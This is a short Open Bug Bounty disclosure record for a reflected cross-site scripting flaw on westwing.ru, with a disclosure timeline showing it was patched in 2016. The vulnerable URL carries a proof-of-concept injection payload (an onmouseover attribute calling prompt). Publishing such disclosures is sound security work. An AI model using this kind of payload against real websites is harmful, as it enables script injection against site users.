westwing.ru XSS vulnerability

2015-08-13T16:31:00
ID OBB:78593
Type openbugbounty
Reporter dim0k
Modified 2016-01-30T22:02:00

Description

Vulnerable URL:
https://www.westwing.ru/lp/lp4/?timg=x&mdprefid;='"onmouseover="prompt(/XSSPOSED/)"&utm;_source=yandex&utm;_medium=cpc&utm;_term=Rossi&utm;_content=Br|Rossi&utm;_campaign=x
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 22:02 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 20741
Google Pagerank| 4
VIP website status:| Yes
Check westwing.ru SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 13 August, 2015 16:31 GMT
Vulnerability existence verified and confirmed| 13 August, 2015 16:32 GMT
Vulnerability patched by the website owner| 30 January, 2016 22:02 GMT